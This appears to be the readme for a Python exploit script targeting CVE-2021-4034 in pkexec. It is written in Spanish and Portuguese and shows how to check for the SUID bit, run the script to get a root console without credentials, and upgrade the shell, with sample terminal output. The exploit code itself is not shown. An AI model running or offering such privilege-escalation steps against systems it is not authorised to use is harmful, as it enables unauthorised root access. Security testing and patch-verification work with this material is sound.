
Script en python sobre la vulnerabilidad CVE-2021-4034
CVE-2021-4034 (pkexec) O uso deste script em python aproveita a vulnerabilidade no arquivo pkexec para ganhar acesso a root sem fornecer credenciais
· Detecta se o binário tem privilégios SUID, neste caso é vulnerável
usuario@gatogamer $ ls -la /usr/bin/pkexec
.rwsr-xr-x 1 root root /usr/bin/pkexec
usuario@gatogamer $
· Executa o exploit para ganhar acesso a root, neste caso só é necessário executá-lo com python3, ao finalizar terá um console como root
usuario@gatogamer $ python3 CVE-2021-4034.py
[+] Iniciando o exploit
[+] Exploit Completo
# whoami
root
#
· Como complemento, você pode alterar o valor de TERM, pode ser 'xterm' ou 'xterm-256color' para melhor estética, além de executar um shell diferente seja 'bash' ou 'zsh', agora temos um console completamente interativo
# export TERM=xterm-256color
# zsh
root@gatogamer $